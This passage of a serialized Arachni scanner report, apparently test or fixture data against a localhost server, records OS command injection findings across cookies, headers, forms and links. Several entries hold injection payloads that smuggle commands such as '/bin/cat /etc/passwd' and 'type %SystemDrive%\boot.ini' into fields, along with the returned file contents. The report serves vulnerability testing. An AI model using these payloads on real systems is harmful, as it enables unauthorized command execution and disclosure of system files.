      :redundant: false
      :async: true
      :regexp: (?-mix:root:x:0:0:.+:[0-9a-zA-Z\/]+)
      :match: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh
      :substring: 
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      - 2
      :injected_orig: " /bin/cat /etc/passwd"
      :altered: cookie2
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        cookie2: cookie value /bin/cat /etc/passwd
      :injected: cookie value /bin/cat /etc/passwd
      :combo: 
        cookie2: cookie value /bin/cat /etc/passwd
      :action: http://localhost:6412/unix/cookie/append
      :verification: false
      :id: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh
    references: 
      OWASP: http://www.owasp.org/index.php/OS_Command_Injection
    regexp: (?-mix:root:x:0:0:.+:[0-9a-zA-Z\/]+)
    regexp_match: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as OS level commands.
    response: "[\"root:x:0:0:root:/root:/bin/bash\\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh\\n\"]"
    severity: High
    tags: 
    - os
    - command
    - code
    - injection
    - regexp
    url: http://localhost:6412/unix/cookie/append
    var: cookie2
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "78"
  cwe_url: http://cwe.mitre.org/data/definitions/78.html
  description: |-
    The web application allows an attacker to
        execute arbitrary OS commands.
  elem: header
  internal_modname: OSCmdInjection
  metasploitable: unix/webapp/arachni_exec
  method: GET
  mod_name: OS command injection
  name: Operating system command injection
  references: 
    OWASP: http://www.owasp.org/index.php/OS_Command_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as OS level commands.
  severity: High
  tags: 
  - os
  - command
  - code
  - injection
  - regexp
  url: http://localhost:6412/unix/header/straight
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "78"
    cwe_url: http://cwe.mitre.org/data/definitions/78.html
    description: |-
      The web application allows an attacker to
          execute arbitrary OS commands.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: "&& /bin/cat /etc/passwd"
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "76"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh
    injected: "&& /bin/cat /etc/passwd"
    internal_modname: OSCmdInjection
    metasploitable: unix/webapp/arachni_exec
    method: GET
    mod_name: OS command injection
    name: Operating system command injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?-mix:root:x:0:0:.+:[0-9a-zA-Z\/]+)
      :match: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh
      :substring: 
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      - 2
      :injected_orig: "&& /bin/cat /etc/passwd"
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: "&& /bin/cat /etc/passwd"
      :injected: "&& /bin/cat /etc/passwd"
      :combo: 
        User-Agent: "&& /bin/cat /etc/passwd"
      :action: http://localhost:6412/unix/header/straight
      :verification: false
      :id: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh
    references: 
      OWASP: http://www.owasp.org/index.php/OS_Command_Injection
    regexp: (?-mix:root:x:0:0:.+:[0-9a-zA-Z\/]+)
    regexp_match: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as OS level commands.
    response: "[\"root:x:0:0:root:/root:/bin/bash\\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh\\n\"]"
    severity: High
    tags: 
    - os
    - command
    - code
    - injection
    - regexp
    url: http://localhost:6412/unix/header/straight
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "78"
  cwe_url: http://cwe.mitre.org/data/definitions/78.html
  description: |-
    The web application allows an attacker to
        execute arbitrary OS commands.
  elem: header
  internal_modname: OSCmdInjection
  metasploitable: unix/webapp/arachni_exec
  method: GET
  mod_name: OS command injection
  name: Operating system command injection
  references: 
    OWASP: http://www.owasp.org/index.php/OS_Command_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as OS level commands.
  severity: High
  tags: 
  - os
  - command
  - code
  - injection
  - regexp
  url: http://localhost:6412/unix/header/append
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "78"
    cwe_url: http://cwe.mitre.org/data/definitions/78.html
    description: |-
      The web application allows an attacker to
          execute arbitrary OS commands.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: arachni_user /bin/cat /etc/passwd
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "76"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh
    injected: arachni_user /bin/cat /etc/passwd
    internal_modname: OSCmdInjection
    metasploitable: unix/webapp/arachni_exec
    method: GET
    mod_name: OS command injection
    name: Operating system command injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?-mix:root:x:0:0:.+:[0-9a-zA-Z\/]+)
      :match: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh
      :substring: 
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      - 2
      :injected_orig: " /bin/cat /etc/passwd"
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: arachni_user /bin/cat /etc/passwd
      :injected: arachni_user /bin/cat /etc/passwd
      :combo: 
        User-Agent: arachni_user /bin/cat /etc/passwd
      :action: http://localhost:6412/unix/header/append
      :verification: false
      :id: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh
    references: 
      OWASP: http://www.owasp.org/index.php/OS_Command_Injection
    regexp: (?-mix:root:x:0:0:.+:[0-9a-zA-Z\/]+)
    regexp_match: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as OS level commands.
    response: "[\"root:x:0:0:root:/root:/bin/bash\\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh\\n\"]"
    severity: High
    tags: 
    - os
    - command
    - code
    - injection
    - regexp
    url: http://localhost:6412/unix/header/append
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "78"
  cwe_url: http://cwe.mitre.org/data/definitions/78.html
  description: |-
    The web application allows an attacker to
        execute arbitrary OS commands.
  elem: form
  internal_modname: OSCmdInjection
  metasploitable: unix/webapp/arachni_exec
  method: POST
  mod_name: OS command injection
  name: Operating system command injection
  references: 
    OWASP: http://www.owasp.org/index.php/OS_Command_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as OS level commands.
  severity: High
  tags: 
  - os
  - command
  - code
  - injection
  - regexp
  url: http://localhost:6412/windows/form/straight
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "78"
    cwe_url: http://cwe.mitre.org/data/definitions/78.html
    description: |-
      The web application allows an attacker to
          execute arbitrary OS commands.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "202"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "[\"\\\\ntimeout=30\\\\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\\\\\\\WINDOWS\\\\n\"]"
    injected: " type %SystemDrive%\\\\boot.ini"
    internal_modname: OSCmdInjection
    metasploitable: unix/webapp/arachni_exec
    method: POST
    mod_name: OS command injection
    name: Operating system command injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?-mix:\[boot loader\](.*)\[operating systems\])
      :match: "[\"\\\\ntimeout=30\\\\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\\\\\\\WINDOWS\\\\n\"]"
      :substring: 
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      - 2
      :injected_orig: " type %SystemDrive%\\\\boot.ini"
      :altered: input
      :element: form
      :params: 
        input: " type %SystemDrive%\\\\boot.ini"
      :follow_location: true
      :injected: " type %SystemDrive%\\\\boot.ini"
      :combo: 
        input: " type %SystemDrive%\\\\boot.ini"
      :action: http://localhost:6412/windows/form/straight
      :verification: false
      :id: "[\"\\\\ntimeout=30\\\\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\\\\\\\WINDOWS\\\\n\"]"
    references: 
      OWASP: http://www.owasp.org/index.php/OS_Command_Injection
    regexp: (?-mix:\[boot loader\](.*)\[operating systems\])
    regexp_match: "[\"\\\\ntimeout=30\\\\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\\\\\\\WINDOWS\\\\n\"]"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as OS level commands.
    response: "[\"[boot loader]\\ntimeout=30\\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\\\WINDOWS\\n[operating systems]\\nmulti(0)disk(0)rdisk(0)partition(1)\\\\WINDOWS=\\\"Microsoft Windows XP Professional\\\" /fastdetect\\n\"]"
    severity: High
    tags: 
    - os
    - command
    - code
    - injection
    - regexp
    url: http://localhost:6412/windows/form/straight
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "78"
  cwe_url: http://cwe.mitre.org/data/definitions/78.html
  description: |-
    The web application allows an attacker to
        execute arbitrary OS commands.
  elem: form
  internal_modname: OSCmdInjection
  metasploitable: unix/webapp/arachni_exec
  method: GET
  mod_name: OS command injection
  name: Operating system command injection
  references: 
    OWASP: http://www.owasp.org/index.php/OS_Command_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as OS level commands.
  severity: High
  tags: 
  - os
  - command
  - code
  - injection
  - regexp
  url: http://localhost:6412/windows/form/append
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "78"
    cwe_url: http://cwe.mitre.org/data/definitions/78.html
    description: |-
      The web application allows an attacker to
          execute arbitrary OS commands.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "202"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "[\"\\\\ntimeout=30\\\\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\\\\\\\WINDOWS\\\\n\"]"
    injected: default type %SystemDrive%\\boot.ini
    internal_modname: OSCmdInjection
    metasploitable: unix/webapp/arachni_exec
    method: GET
    mod_name: OS command injection
    name: Operating system command injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?-mix:\[boot loader\](.*)\[operating systems\])
      :match: "[\"\\\\ntimeout=30\\\\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\\\\\\\WINDOWS\\\\n\"]"
      :substring: 
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      - 2
      :injected_orig: " type %SystemDrive%\\\\boot.ini"
      :altered: input
      :element: form
      :params: 
        input: default type %SystemDrive%\\boot.ini
      :follow_location: true
      :injected: default type %SystemDrive%\\boot.ini
      :combo: 
        input: default type %SystemDrive%\\boot.ini
      :action: http://localhost:6412/windows/form/append
      :verification: false
      :id: "[\"\\\\ntimeout=30\\\\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\\\\\\\WINDOWS\\\\n\"]"
    references: 
      OWASP: http://www.owasp.org/index.php/OS_Command_Injection
    regexp: (?-mix:\[boot loader\](.*)\[operating systems\])
    regexp_match: "[\"\\\\ntimeout=30\\\\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\\\\\\\WINDOWS\\\\n\"]"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as OS level commands.
    response: "[\"[boot loader]\\ntimeout=30\\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\\\WINDOWS\\n[operating systems]\\nmulti(0)disk(0)rdisk(0)partition(1)\\\\WINDOWS=\\\"Microsoft Windows XP Professional\\\" /fastdetect\\n\"]"
    severity: High
    tags: 
    - os
    - command
    - code
    - injection
    - regexp
    url: http://localhost:6412/windows/form/append
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "78"
  cwe_url: http://cwe.mitre.org/data/definitions/78.html
  description: |-
    The web application allows an attacker to
        execute arbitrary OS commands.
  elem: link
  internal_modname: OSCmdInjection
  metasploitable: unix/webapp/arachni_exec
  method: GET
  mod_name: OS command injection
  name: Operating system command injection
  references: 
    OWASP: http://www.owasp.org/index.php/OS_Command_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as OS level commands.
  severity: High
  tags: 
  - os
  - command
  - code
  - injection
  - regexp
  url: http://localhost:6412/windows/link/straight?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "78"
    cwe_url: http://cwe.mitre.org/data/definitions/78.html
    description: |-
      The web application allows an attacker to
          execute arbitrary OS commands.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "202"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "[\"\\\\ntimeout=30\\\\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\\\\\\\WINDOWS\\\\n\"]"
    injected: " type %SystemDrive%\\\\boot.ini"
    internal_modname: OSCmdInjection
    metasploitable: unix/webapp/arachni_exec
    method: GET
    mod_name: OS command injection
    name: Operating system command injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?-mix:\[boot loader\](.*)\[operating systems\])
      :match: "[\"\\\\ntimeout=30\\\\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\\\\\\\WINDOWS\\\\n\"]"
      :substring: 
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      - 2
      :injected_orig: " type %SystemDrive%\\\\boot.ini"
      :altered: input
      :element: link
      :params: 
        input: " type %SystemDrive%\\\\boot.ini"
      :follow_location: true
      :injected: " type %SystemDrive%\\\\boot.ini"
      :combo: 
        input: " type %SystemDrive%\\\\boot.ini"
      :action: http://localhost:6412/windows/link/straight?input=default
      :verification: false
      :id: "[\"\\\\ntimeout=30\\\\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\\\\\\\WINDOWS\\\\n\"]"
    references: 
      OWASP: http://www.owasp.org/index.php/OS_Command_Injection
    regexp: (?-mix:\[boot loader\](.*)\[operating systems\])
    regexp_match: "[\"\\\\ntimeout=30\\\\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\\\\\\\WINDOWS\\\\n\"]"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as OS level commands.
    response: "[\"[boot loader]\\ntimeout=30\\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\\\WINDOWS\\n[operating systems]\\nmulti(0)disk(0)rdisk(0)partition(1)\\\\WINDOWS=\\\"Microsoft Windows XP Professional\\\" /fastdetect\\n\"]"
    severity: High
    tags: 
    - os
    - command
    - code
    - injection
    - regexp
    url: http://localhost:6412/windows/link/straight?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "78"
  cwe_url: http://cwe.mitre.org/data/definitions/78.html
  description: |-
    The web application allows an attacker to
        execute arbitrary OS commands.
  elem: link
  internal_modname: OSCmdInjection
  metasploitable: unix/webapp/arachni_exec
  method: GET
  mod_name: OS command injection
  name: Operating system command injection
  references: 
    OWASP: http://www.owasp.org/index.php/OS_Command_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as OS level commands.
  severity: High
  tags: 
  - os
  - command
  - code
  - injection
  - regexp
  url: http://localhost:6412/windows/link/append?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "78"
    cwe_url: http://cwe.mitre.org/data/definitions/78.html
    description: |-
      The web application allows an attacker to
          execute arbitrary OS commands.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "202"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "[\"\\\\ntimeout=30\\\\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\\\\\\\WINDOWS\\\\n\"]"
    injected: default type %SystemDrive%\\boot.ini
    internal_modname: OSCmdInjection
    metasploitable: unix/webapp/arachni_exec
    method: GET
    mod_name: OS command injection
    name: Operating system command injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?-mix:\[boot loader\](.*)\[operating systems\])
      :match: "[\"\\\\ntimeout=30\\\\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\\\\\\\WINDOWS\\\\n\"]"
      :substring: 
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      - 2
      :injected_orig: " type %SystemDrive%\\\\boot.ini"
      :altered: input
      :element: link
      :params: 
        input: default type %SystemDrive%\\boot.ini
      :follow_location: true
      :injected: default type %SystemDrive%\\boot.ini
      :combo: 
        input: default type %SystemDrive%\\boot.ini
      :action: http://localhost:6412/windows/link/append?input=default
      :verification: false
      :id: "[\"\\\\ntimeout=30\\\\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\\\\\\\WINDOWS\\\\n\"]"
    references: 
      OWASP: http://www.owasp.org/index.php/OS_Command_Injection
    regexp: (?-mix:\[boot loader\](.*)\[operating systems\])
    regexp_match: "[\"\\\\ntimeout=30\\\\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\\\\\\\WINDOWS\\\\n\"]"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as OS level commands.
    response: "[\"[boot loader]\\ntimeout=30\\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\\\WINDOWS\\n[operating systems]\\nmulti(0)disk(0)rdisk(0)partition(1)\\\\WINDOWS=\\\"Microsoft Windows XP Professional\\\" /fastdetect\\n\"]"
    severity: High
    tags: 
    - os
    - command
    - code
    - injection
    - regexp
    url: http://localhost:6412/windows/link/append?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "78"
  cwe_url: http://cwe.mitre.org/data/definitions/78.html
  description: |-
    The web application allows an attacker to
        execute arbitrary OS commands.
  elem: cookie
  internal_modname: OSCmdInjection
  metasploitable: unix/webapp/arachni_exec
  method: GET
  mod_name: OS command injection
  name: Operating system command injection
  references: 
    OWASP: http://www.owasp.org/index.php/OS_Command_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as OS level commands.
  severity: High
  tags: 
  - os
  - command
  - code
  - injection
  - regexp
  url: http://localhost:6412/windows/cookie/straight
  var: cookie
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "78"
    cwe_url: http://cwe.mitre.org/data/definitions/78.html
    description: |-
      The web application allows an attacker to
          execute arbitrary OS commands.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=+type+%25SystemDrive%25\\boot.ini;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "202"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "[\"\\\\ntimeout=30\\\\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\\\\\\\WINDOWS\\\\n\"]"
    injected: " type %SystemDrive%\\\\boot.ini"
    internal_modname: OSCmdInjection
    metasploitable: unix/webapp/arachni_exec
    method: GET
    mod_name: OS command injection
    name: Operating system command injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?-mix:\[boot loader\](.*)\[operating systems\])
      :match: "[\"\\\\ntimeout=30\\\\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\\\\\\\WINDOWS\\\\n\"]"
      :substring: 
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      - 2
      :injected_orig: " type %SystemDrive%\\\\boot.ini"
      :altered: cookie
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        cookie: " type %SystemDrive%\\\\boot.ini"
      :injected: " type %SystemDrive%\\\\boot.ini"
      :combo: 
        cookie: " type %SystemDrive%\\\\boot.ini"
      :action: http://localhost:6412/windows/cookie/straight
      :verification: false
      :id: "[\"\\\\ntimeout=30\\\\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\\\\\\\WINDOWS\\\\n\"]"
    references: 
      OWASP: http://www.owasp.org/index.php/OS_Command_Injection
    regexp: (?-mix:\[boot loader\](.*)\[operating systems\])
    regexp_match: "[\"\\\\ntimeout=30\\\\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\\\\\\\WINDOWS\\\\n\"]"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as OS level commands.
    response: "[\"[boot loader]\\ntimeout=30\\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\\\WINDOWS\\n[operating systems]\\nmulti(0)disk(0)rdisk(0)partition(1)\\\\WINDOWS=\\\"Microsoft Windows XP Professional\\\" /fastdetect\\n\"]"
    severity: High
    tags: 
    - os
    - command
    - code
    - injection
    - regexp
    url: http://localhost:6412/windows/cookie/straight
    var: cookie
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "78"
  cwe_url: http://cwe.mitre.org/data/definitions/78.html
  description: |-
    The web application allows an attacker to
        execute arbitrary OS commands.
  elem: cookie
  internal_modname: OSCmdInjection
  metasploitable: unix/webapp/arachni_exec
  method: GET
  mod_name: OS command injection
  name: Operating system command injection
  references: 
    OWASP: http://www.owasp.org/index.php/OS_Command_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as OS level commands.
  severity: High
  tags: 
  - os
  - command
  - code
  - injection
  - regexp
  url: http://localhost:6412/windows/cookie/append
  var: cookie2
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "78"
    cwe_url: http://cwe.mitre.org/data/definitions/78.html
    description: |-
      The web application allows an attacker to
          execute arbitrary OS commands.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+value+type+%25SystemDrive%25\\boot.ini
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "202"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "[\"\\\\ntimeout=30\\\\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\\\\\\\WINDOWS\\\\n\"]"
    injected: cookie value type %SystemDrive%\\boot.ini
    internal_modname: OSCmdInjection
    metasploitable: unix/webapp/arachni_exec
    method: GET
    mod_name: OS command injection
    name: Operating system command injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?-mix:\[boot loader\](.*)\[operating systems\])
      :match: "[\"\\\\ntimeout=30\\\\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\\\\\\\WINDOWS\\\\n\"]"
      :substring: 
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      - 2
      :injected_orig: " type %SystemDrive%\\\\boot.ini"
      :altered: cookie2
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        cookie2: cookie value type %SystemDrive%\\boot.ini
      :injected: cookie value type %SystemDrive%\\boot.ini
      :combo: 
        cookie2: cookie value type %SystemDrive%\\boot.ini
      :action: http://localhost:6412/windows/cookie/append
      :verification: false
      :id: "[\"\\\\ntimeout=30\\\\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\\\\\\\WINDOWS\\\\n\"]"
    references: 
      OWASP: http://www.owasp.org/index.php/OS_Command_Injection
    regexp: (?-mix:\[boot loader\](.*)\[operating systems\])
    regexp_match: "[\"\\\\ntimeout=30\\\\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\\\\\\\WINDOWS\\\\n\"]"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as OS level commands.
    response: "[\"[boot loader]\\ntimeout=30\\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\\\WINDOWS\\n[operating systems]\\nmulti(0)disk(0)rdisk(0)partition(1)\\\\WINDOWS=\\\"Microsoft Windows XP Professional\\\" /fastdetect\\n\"]"
    severity: High
    tags: 
    - os
    - command
    - code
    - injection
    - regexp
    url: http://localhost:6412/windows/cookie/append
    var: cookie2
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "78"
  cwe_url: http://cwe.mitre.org/data/definitions/78.html
  description: |-
    The web application allows an attacker to
        execute arbitrary OS commands.
  elem: header
  internal_modname: OSCmdInjection
  metasploitable: unix/webapp/arachni_exec
  method: GET
  mod_name: OS command injection
  name: Operating system command injection
  references: 
    OWASP: http://www.owasp.org/index.php/OS_Command_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as OS level commands.
  severity: High
  tags: 
  - os
  - command
  - code
  - injection
  - regexp
  url: http://localhost:6412/windows/header/straight
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "78"
    cwe_url: http://cwe.mitre.org/data/definitions/78.html
    description: |-
      The web application allows an attacker to
          execute arbitrary OS commands.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: "&& type %SystemDrive%\\\\boot.ini"
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "202"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "[\"\\\\ntimeout=30\\\\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\\\\\\\WINDOWS\\\\n\"]"
    injected: "&& type %SystemDrive%\\\\boot.ini"
    internal_modname: OSCmdInjection
    metasploitable: unix/webapp/arachni_exec
    method: GET
    mod_name: OS command injection
    name: Operating system command injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?-mix:\[boot loader\](.*)\[operating systems\])
      :match: "[\"\\\\ntimeout=30\\\\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\\\\\\\WINDOWS\\\\n\"]"
      :substring: 
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      - 2
      :injected_orig: "&& type %SystemDrive%\\\\boot.ini"
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: "&& type %SystemDrive%\\\\boot.ini"
      :injected: "&& type %SystemDrive%\\\\boot.ini"
      :combo: 
        User-Agent: "&& type %SystemDrive%\\\\boot.ini"
      :action: http://localhost:6412/windows/header/straight
      :verification: false
      :id: "[\"\\\\ntimeout=30\\\\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\\\\\\\WINDOWS\\\\n\"]"
    references: 
      OWASP: http://www.owasp.org/index.php/OS_Command_Injection
